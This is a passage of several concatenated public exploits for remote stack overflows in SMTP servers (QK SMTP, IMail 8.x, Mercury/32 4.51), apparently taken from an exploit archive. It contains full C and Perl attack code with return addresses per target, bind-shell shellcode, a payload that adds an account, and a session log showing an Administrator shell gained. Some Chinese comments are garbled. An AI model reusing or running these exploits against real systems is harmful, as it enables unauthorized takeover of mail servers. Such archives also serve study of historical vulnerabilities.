printf("[i] Exploit by: \tExpanders\n\n");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: \t%s <host> <port> <targ>\n\n",filename);
printf(" \t<host> : Victim's host\n");
printf(" \t<port> : Victim's port :: Default: 25\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("# \t Platform\n");
printf("-----------------------------------------------\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);
printf("-----------------------------------------------\n");
exit(0);
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
char encoded_user[MAX_ENCODED_LEN];
char encoded_pass[MAX_ENCODED_LEN];
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
char shellcode[SC_MAX_SIZE];
banner();
if( (argc != 4) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
printf("[+] Target OS is: %s\n",targets[atoi(argv[3])].platform);
printf("[+] Creating evil buffer...");
fflush(stdout);
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(BUGSTR));
memset(buffer,0x73,BUFFSIZE); // Fill with unicode nops
memset(buffer+4000,0x45,1000);
encode_alphanum(encoded_user,NETADD_USER,strlen(NE TADD_USER));
encode_alphanum(encoded_pass,NETADD_PASS,strlen(NE TADD_PASS));
sprintf(shellcode,alphanum_shellcode,encoded_user, encoded_pass,encoded_user);
memcpy(buffer+RET_OFFSET,&targets[atoi(argv[3])].addr,4);
memcpy(buffer+SHELLCODE_OFFSET,shellcode,strlen(sh ellcode));
memcpy(buffer+JMPBACK_OFFSET,jmpback,strlen(jmpbac k));
memset(buffer+4500,0x00,1);
printf("done\n");
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
//rcv=recv(s,recvbuf,256,0);
if((rcv = recv(s,recvbuf,256,0)) < 0)
{
printf("\n[X] Error while recieving banner!\n");
exit( 1 );
}
if (strstr(recvbuf,"QK SMTP")!=0)
{
sleep(1);
sprintf(request,"%s",HELO);
printf("[+] Sending EHLO\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
sprintf(request,"%s",MAIL_FROM);
printf("[+] Sending MAIL FROM\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
sprintf(request,BUGSTR,buffer);
printf("[+] Sending EXPLOIT\n");
if ( send ( s, request, strlen(request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
exit ( 1 );
}
sleep(1);
printf("[+] Done - New account should have been added:\n");
printf("[i] LOGIN:\t%s\n",NETADD_USER);
printf("[i] PASSWORD:\t%s\n",NETADD_PASS);
printf("[+] Exploit now hangs up. see ya.\n\n");
} else
printf("[X] This server is not running QK SMTP\n");
close(s);
free(buffer);
free(request);
return 0;
}
// Ripped from Skylined's alpha2.c
int encode_alphanum(unsigned char *dest,unsigned char *src,int len){
char dump[2];
int i,n, input, A, B, C, D, E, F;
char* valid_chars;
struct timeval tv;
struct timezone tz;
memset(dest,0x00,MAX_ENCODED_LEN);
gettimeofday(&tv, &tz);
srand((int)tv.tv_sec*1000+tv.tv_usec);
valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno pqrstuvwxyz";
for(n=0;n<len;n++) {
input = src[n];
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
D = (A-E) & 0x0f;
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
C = valid_chars[i] >> 4;
sprintf(dump,"%c%c", (C<<4)+D, (E<<4)+F);
strcat(dest,dump);
}
return 0;
}
// [2006-10-25]
25 Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 25],
'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],
},
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
If we send a long strings for RCPT TO command contained within the characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),
'Refs' =>
[
['BID', '19885'],
['CVE', '2006-4379'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
],
'Targets' =>
[
['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12
],
'DefaultTarget' => 0,
'Keys' => ['smtp'],
'DisclosureDate' => 'September 7 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $ehlo = "EHLO " . "\r\n";
my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
my $pattern = "\x20\x3c\x40";
$pattern .= pack('V', $target->[1]);
$pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
$pattern .= $shellcode;
$pattern .= "\x4a\x61\x63\x3e";
my $request = "RCPT TO: " . $pattern ."\n";
$self->PrintLine(sprintf (" Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->Recv(-1, 5);
$s->Send($ehlo);
$self->PrintLine(" I'm sending ehlo command");
$self->PrintLine(" $r");
sleep(2);
$s->Send($mail_from);
$self->PrintLine(" I'm sending mail from command");
$r = $s->Recv(-1, 10);
$self->PrintLine(" $r");
sleep(2);
$s->Send($request);
$self->PrintLine(" I'm sending rcpt to command");
sleep(2);
return;
}
# [2007-02-04]
25 Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org
2007-08-22
Code by: Zhenhan.Liu
Original POC: http://www.enigmagroup.org/exploits/4294
Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
Our Mail-list: http://list.ph4nt0m.org (Chinese)
It will bind a cmdshell on port 1154 if successful.
Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org 2007-08-22
connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S] 250-SIZE 0
[S] 250 HELP
[C] AUTH CRAM-MD5
[S] 334 PDM0OTg4MjguMzQ2QHJvb3Q+
[C] Send Payload...
[-] Done! cmdshell@1154?
Z:\Exp\Mercury SMTPD\Mercury SMTPD>nc -vv 127.0.0.1 1154
DNS fwd/rev mismatch: localhost != gnu
localhost [127.0.0.1] 1154 (?) open
Microsoft Windows XP [°æ±¾ 5.1.2600]
(C) °æȨËÃ� �Óà1985-2001 Microsoft Corp.
e:\MERCURY>whoami
whoami
Administrator
*/
#include <io.h>
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
/* win32_bind - EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
unsigned char shellcode[] =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0"
"\x66\x68\x04\x82\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6"
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\x d0";
// Base64×Ö·û¼ ¯
__inline char GetB64Char(int index)
{
const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";
if (index >= 0 && index < 64)
return szBase64Table[index];
return '=';
}
// ´ÓË«×Ã� �–ÖÃÂÈ¡µÃ� ��¥Ã—Ö½Ú
#define B0(a) (a & 0xFF)
#define B1(a) (a >> 8 & 0xFF)
#define B2(a) (a >> 16 & 0xFF)
#define B3(a) (a >> 24 & 0xFF)
// ±àÂëºóµÃÂ� ��³¤¶ÈÒÃ� �»Â°Ã£Â±ÃˆÃ”à ‚Â*ÎĶàÕ¼1/3µÄ´æ´Â ¢Â¿Ã•Â¼Ã¤Â£à ‚¬Ã‡Ã«Â±Â£ÃÂ� �¤base64codeÓÃÂ×à £Â¹Â»ÂµÃ„¿� �ƒÂ•Ã‚¼Ã¤
inline int Base64Encode(char * base64code, const char * src, int src_len)
{
if (src_len == 0)
src_len = strlen(src);
int len = 0;
unsigned char* psrc = (unsigned char*)src;
char * p64 = base64code;
for (int i = 0; i < src_len - 3; i += 3)
{
unsigned long ulTmp = *(unsigned long*)psrc;
register int b0 = GetB64Char((B0(ulTmp) >> 2) & 0x3F);
register int b1 = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F);
register int b2 = GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F);
register int b3 = GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F);
*((unsigned long*)p64) = b0 | b1 << 8 | b2 << 16 | b3 << 24;
len += 4;
p64 += 4;
psrc += 3;
}
// ´¦ÀÃÂ*×ÃÂ� �ºóÓàõIJÂ� �»ÃƒÂ—ã3×Ö½à ƒÂšÃ‚µÃ„¶öÊ� �ƒÂ½Ã‚¾ÃÂ
if (i < src_len)
{
int rest = src_len - i;
unsigned long ulTmp = 0;
for (int j = 0; j < rest; ++j)
{
*(((unsigned char*)&ulTmp) + j) = *psrc++;
}
p64[0] = GetB64Char((B0(ulTmp) >> 2) & 0x3F);
p64[1] = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F);
p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : '=';
p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : '=';
p64 += 4;
len += 4;
}
*p64 = '\0';
return len;
}
char* GetErrorMessage(DWORD dwMessageId)
{
static char ErrorMessage[1024];
DWORD dwRet;
dwRet = FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM, // source and processing options
NULL, // pointer to message source
dwMessageId, // requested message identifier
0, //dwLanguageId
ErrorMessage, //lpBuffer
1024, //nSize
NULL //Arguments
);
if(dwRet)
return ErrorMessage;
else
{
sprintf(ErrorMessage, "ID:%d(%08.8X)", dwMessageId, dwMessageId);
return ErrorMessage;
}
}
int MakeConnection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}
int check_recv(SOCKET s, char* str_sig)
{
char buf[1024];
int ret;
for(;;)
{
memset(buf, 0, sizeof(buf));
ret = recv(s, buf, sizeof(buf), 0);
if(ret > 0)
{
printf("[S] %s", buf);
}
else
{
printf("[-] recv() %s\n", GetErrorMessage(GetLastError()));
closesocket(s);
ExitProcess(-1);
}
if(strstr(buf, str_sig))
{
break;
}
else
{
continue;
}
} //for(;;)
return ret;
}
int check_send(SOCKET s, char* buf, unsigned int buf_len)
{
int ret;
ret = send(s, buf, buf_len, 0);
if( ret >0)
{
return ret;
}
else
{
printf("[-] send() %s\n", GetErrorMessage(GetLastError()));
closesocket(s);
ExitProcess(-1);
}
}
void exploit_mercury_smtpd(char* ip, unsigned short port)
{
SOCKET s;
WSADATA wsa;
char buf[1500];
char payload[sizeof(buf)*4/3+16];
int base64_len;
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[1244-sizeof(shellcode)-32], shellcode, sizeof(shellcode));
memcpy(&buf[1244], "\x90\x90\xeb\x06", 4);
memcpy(&buf[1244+4], "\x2d\x12\x40\x00", 4); //universal opcode in mercury.exe. no safeseh
memcpy(&buf[1244+4+4], "\x90\x90\x90\x90\xE9\x44\xfd\xff\xff", 9);
buf[sizeof(buf)-1] = '\0';
memset(payload, 0x00, sizeof(payload));
base64_len = Base64Encode(payload, buf, sizeof(buf));
memcpy(&payload[base64_len], "\r\n", 3);
printf(" connect to %s:%d ... ", ip, port);
WSAStartup(MAKEWORD(2,2), &wsa);
s = MakeConnection(ip, port, 10);
if(s <= 0)
{
printf("Failed! %s\n", GetErrorMessage(GetLastError()) );
return;
}
else
{
printf("OK!\n");
}
_snprintf(buf, sizeof(buf), "EHLO void#ph4nt0m.org\r\n");
printf("[C] %s", buf);
check_send(s, buf, strlen(buf));
check_recv(s, "250 HELP");
_snprintf(buf, sizeof(buf), "AUTH CRAM-MD5\r\n");
printf("[C] %s", buf);
check_send(s, buf, strlen(buf));
check_recv(s, "334");
printf("[C] Send Payload...\n");
check_send(s, payload, strlen(payload));
printf("[-] Done! cmdshell@1154?\n");
closesocket(s);
WSACleanup();
}
void main(int argc, char* argv[])
{
printf("== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\n");
printf("== Public Version 1.0\n");
printf("== http://www.ph4nt0m.org 2007-08-22\n");
printf("== code by Zhenhan.Liu\n\n");
if(argc==3)
exploit_mercury_smtpd(argv[1], atoi(argv[2]));
else
{
printf( "Usage:\n"
" %s <ip> <port> \n", argv[0]);
}
}
// [2007-08-22]
25 Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Mercury/32 SMTP Server
* Found by : [email protected], http://www.offensive-security.com
* ----------------------------------------
* Exploit : Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP overwrite exploit
* Exploit date : 26.08.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : The EIP overwrite exploitation is easy here and works on previous versions of the
* Mercury/32, like 4.01a, 4.01b and may be earlier.
* ----------------------------------------
* Thanks to:
* 1. eliteb0y ( )
* 2. The Metasploit project ( http://metasploit.com )
* 3. http://www.ph4nt0m.org ( )
* 4. Dreatica-FXP crew ( )
* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************** **********************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
#include <ctype.h>
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char *t ;
unsigned long ret ;
} targets[]=
{
{"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll ]", 0x258d0d1e },// jmp esp
{"Windows XP SP0 RUSSIAN [shell32.dll]", 0x77b49bbb },// jmp esp
{"Windows XP SP1 RUSSIAN [user32.dll ]", 0x77db532f },// jmp esp
{"Windows XP SP2 RUSSIAN [shell32.dll]", 0x7d168fe7 },// jmp esp
{"Windows 2003 SP0 STANDART [shell32.dll]", 0x77b0f967 },// jmp esp
{"Debug", 0x42424242 },//
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 4444 [ args: none ]", 344,
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
"\x2b\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x02"
"\x6b\x82\x87\x83\xee\xfc\xe2\xf4\xfe\x01\x69\xca\x ea\x92\x7d\x78"
"\xfd\x0b\x09\xeb\x26\x4f\x09\xc2\x3e\xe0\xfe\x82\x 7a\x6a\x6d\x0c"
"\x4d\x73\x09\xd8\x22\x6a\x69\xce\x89\x5f\x09\x86\x ec\x5a\x42\x1e"
"\xae\xef\x42\xf3\x05\xaa\x48\x8a\x03\xa9\x69\x73\x 39\x3f\xa6\xaf"
"\x77\x8e\x09\xd8\x26\x6a\x69\xe1\x89\x67\xc9\x0c\x 5d\x77\x83\x6c"
"\x01\x47\x09\x0e\x6e\x4f\x9e\xe6\xc1\x5a\x59\xe3\x 89\x28\xb2\x0c"
"\x42\x67\x09\xf7\x1e\xc6\x09\xc7\x0a\x35\xea\x09\x 4c\x65\x6e\xd7"
"\xfd\xbd\xe4\xd4\x64\x03\xb1\xb5\x6a\x1c\xf1\xb5\x 5d\x3f\x7d\x57"
"\x6a\xa0\x6f\x7b\x39\x3b\x7d\x51\x5d\xe2\x67\xe1\x 83\x86\x8a\x85"
"\x57\x01\x80\x78\xd2\x03\x5b\x8e\xf7\xc6\xd5\x78\x d4\x38\xd1\xd4"
"\x51\x38\xc1\xd4\x41\x38\x7d\x57\x64\x03\x93\xdb\x 64\x38\x0b\x66"
"\x97\x03\x26\x9d\x72\xac\xd5\x78\xd4\x01\x92\xd6\x 57\x94\x52\xef"
"\xa6\xc6\xac\x6e\x55\x94\x54\xd4\x57\x94\x52\xef\x e7\x22\x04\xce"
"\x55\x94\x54\xd7\x56\x3f\xd7\x78\xd2\xf8\xea\x60\x 7b\xad\xfb\xd0"
"\xfd\xbd\xd7\x78\xd2\x0d\xe8\xe3\x64\x03\xe1\xea\x 8b\x8e\xe8\xd7"
"\x5b\x42\x4e\x0e\xe5\x01\xc6\x0e\xe0\x5a\x42\x74\x a8\x95\xc0\xaa"
"\xfc\x29\xae\x14\x8f\x11\xba\x2c\xa9\xc0\xea\xf5\x fc\xd8\x94\x78"
"\x77\x2f\x7d\x51\x59\x3c\xd0\xd6\x53\x3a\xe8\x86\x 53\x3a\xd7\xd6"
"\xfd\xbb\xea\x2a\xdb\x6e\x4c\xd4\xfd\xbd\xe8\x78\x fd\x5c\x7d\x57"
"\x89\x3c\x7e\x04\xc6\x0f\x7d\x51\x50\x94\x52\xef\x f2\xe1\x86\xd8"
"\x51\x94\x54\x78\xd2\x6b\x82\x87"
},
{NULL , NULL }
};
// -----------------------------------------------------------------
// BASE64
// -----------------------------------------------------------------
char base64_chars[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret)
{
int i = 0;
int j = 0;
unsigned char char_array_3[3];
unsigned char char_array_4[4];
while (in_len--)
{
char_array_3[i++] = *(bytes_to_encode++);
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for(i = 0; (i <4) ; i++)
ret[strlen(ret)]=base64_chars[char_array_4[i]];
//ret += base64_chars[char_array_4[i]];
i = 0;
}
}
if (i)
{
for(j = i; j < 3; j++)
char_array_3[j] = '\0';
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; (j < i + 1); j++)
ret[strlen(ret)]=base64_chars[char_array_4[j]];
//ret += base64_chars[char_array_4[j]];
while((i++ < 3))
ret[strlen(ret)]='=';
//ret += '=';
}
}
void base64_decode(char const * encoded_string, char * ret)
{
int in_len = strlen(encoded_string);//encoded_string.size();
int i = 0;
int j = 0;
int in_ = 0;
unsigned char char_array_4[4], char_array_3[3];
while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_]))
{
char_array_4[i++] = encoded_string[in_]; in_++;
if (i ==4) {
for (i = 0; i <4; i++)
char_array_4[i] = strchr(base64_chars, char_array_4[i])-base64_chars;//base64_chars.find(char_array_4[i]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (i = 0; (i < 3); i++)
ret[strlen(ret)]=char_array_3[i];
//ret += char_array_3[i];
i = 0;
}
}
if (i) {
for (j = i; j <4; j++)
char_array_4[j] = 0;
for (j = 0; j <4; j++)
char_array_4[j] = strchr(base64_chars, char_array_4[j])-base64_chars;//base64_chars.find(char_array_4[j]);
char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];
for (j = 0; (j < i - 1); j++) ret[strlen(ret)]=char_array_3[j];//ret += char_array_3[j];
}
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
int main(int argc, char **argv)
{
char * remotehost=NULL;
char default_remotehost[]="127.0.0.1";
char temp1[100], temp2[100];
int port, itarget, sh;
SOCKET s;
char c;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=25;
itarget=0;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:s:t:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 's':
sscanf(optarg, "%d", &sh);
sh--;
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# \n", temp2, temp1);
if(itarget>=0)
{
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 57 - strlen(targets[itarget].t) -1);
printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
}else
{
printf(" # ------------------------------------------------------------------- # \n");
printf("[-] Target is invalid\n");
end_logo();
return -1;
}
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
printf("[+] Checking if server is online\n");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf("[-] Server is OFFLINE\n");
end_logo();
return 0;
}
closesocket(s);
printf("[+] Server is ONLINE\n");
unsigned char buf[50000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh);
printf("[+] Attacking buffers constructed\n");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf("[-] Cannot exploit server %s\n", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf("[+] Buffer sent");
printf("[+] Now try connect to %s:%d\n", remotehost, 4444);
end_logo();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror("[-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
void prepare_shellcode( char * fsh, unsigned int * fshlen, int sh)
